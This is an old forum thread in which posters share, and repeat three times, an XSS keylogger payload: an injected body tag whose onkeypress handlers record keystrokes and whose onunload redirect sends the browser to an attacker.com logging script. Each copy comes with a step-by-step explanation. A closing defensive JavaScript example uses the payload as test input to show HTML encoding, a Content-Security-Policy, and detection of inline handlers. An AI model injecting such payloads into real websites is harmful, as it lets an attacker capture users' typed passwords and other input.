Screech Posted August 14, 2006

XSS attacks are often looked at as puny or ineffective, being only a matter of being able to steal cookies, or pop up annoying boxes. You can also rewrite certain values in the HTML DOM. But XSS attacks are even more dangerous than that, and this is a perfect example of how.

First, I will give you the code to inject, then I will explain it step by step.

    <body onload=key="" onkeypress=if(event.which){key=key+String.fromCharCode(event.which)}else{key=key+String.fromCharCode(event.keyCode) onunload=window.location="http://www.attacker.com/cookiestealer.php?cookie=">

It's a body tag, so whatever in the body is typed in, essentially anything on the page, will be logged.

When the page loads, it initializes the variable "key".

When a key is pressed, it finds whether the browser uses event.which (Netscape-compatible) or event.keyCode (IE-compatible) and converts the ASCII value of the key pressed to its character, then adds it to the end of the variable "key".

When the page is unloaded (that is, the browser window is closed or a new page is loaded), it sends the browser to a new location, namely your logging program.
Screech Posted August 14, 2006

I translated it:

First, I will give you the code for the injection, then I will explain step by step how it works.

    <body onload=key="" onkeypress=if(event.which){key=key+String.fromCharCode(event.which)}else{key=key+String.fromCharCode(event.keyCode) onunload=window.location="http://www.attacker.com/cookiestealer.php?cookie=">

It is a body tag, so anything that is put in the body, first of all anything on the page, will be logged.

When the page is loaded, it will initialize the variable "key" (the key variable).

When a key is pressed, you can find out when the browser uses event.which (Netscape-compatible) or event.keyCode (IE-compatible), and it will convert the ASCII value of the pressed key to its character, which is then added to the end of the variable key.

When the page is unloaded (that is, the browser window is closed or a new page is being loaded), it sends the browser to another location, namely your logging program.
tzeus Posted April 1, 2007

Well, fine... but the code? I was really interested in this.
hfhun Posted April 5, 2007

This is the complete tutorial:

XSS attacks are often looked at as puny or ineffective, being only a matter of being able to steal cookies, or pop up annoying boxes. You can also rewrite certain values in the HTML DOM. But XSS attacks are even more dangerous than that, and this is a perfect example of how.

First, I will give you the code to inject, then I will explain it step by step.

    <body onload=key="" onkeypress=if(event.which){key=key+String.fromCharCode(event.which)}else{key=key+String.fromCharCode(event.keyCode) onunload=window.location="http://www.attacker.com/cookiestealer.php?cookie=">

It's a body tag, so whatever in the body is typed in, essentially anything on the page, will be logged.

When the page loads, it initializes the variable "key".

When a key is pressed, it finds whether the browser uses event.which (Netscape-compatible) or event.keyCode (IE-compatible) and converts the ASCII value of the key pressed to its character, then adds it to the end of the variable "key".

When the page is unloaded (that is, the browser window is closed or a new page is loaded), it sends the browser to a new location, namely your logging program.
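
The defensive side of the injected `<body>` tag quoted in this thread, as an added example that is not part of any poster's code: user text is HTML-encoded before it is written into the page, a Content-Security-Policy without 'unsafe-inline' is sent so inline handlers are refused, and `on*` attributes in the input are listed for logging. The names `escapeHtml`, `findInlineHandlers`, `renderComment` and the policy string are assumptions chosen for illustration; `SAMPLE` is the tag exactly as quoted in the posts.

```javascript
// Added defensive example. SAMPLE is the tag quoted in the thread, used only as test input.
const SAMPLE = '<body onload=key="" onkeypress=if(event.which){key=key+String.fromCharCode(event.which)}' +
  'else{key=key+String.fromCharCode(event.keyCode) ' +
  'onunload=window.location="http://www.attacker.com/cookiestealer.php?cookie=">';

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode untrusted text for HTML element content or a quoted attribute value.
// After encoding, the browser shows the tag as text instead of parsing it.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Heuristic for logging and triage only (not a filter): list the inline
// event-handler attributes (on*) that appear inside any tag in the input.
function findInlineHandlers(input) {
  const found = [];
  for (const tag of String(input).match(/<[a-z][^>]*/gi) || []) {
    for (const m of tag.matchAll(/[\s\/"']on([a-z]+)\s*=/gi)) {
      const name = 'on' + m[1].toLowerCase();
      if (!found.includes(name)) found.push(name);
    }
  }
  return found;
}

// Policy without 'unsafe-inline': a browser enforcing it refuses inline
// event handlers and inline <script>, even if an encoding bug slips through.
const CSP = "default-src 'self'; script-src 'self'";

// Hypothetical page handler: response headers, encoded body, and what to log.
function renderComment(userText) {
  return {
    headers: { 'Content-Security-Policy': CSP, 'Content-Type': 'text/html; charset=utf-8' },
    body: '<div class="comment">' + escapeHtml(userText) + '</div>',
    flagged: findInlineHandlers(userText),
  };
}

const page = renderComment(SAMPLE);
console.log('handlers seen in input:', page.flagged.join(', '));
console.log(page.body);
```

Encoding at output is the fix; the handler list only tells the operator that someone submitted markup with event attributes.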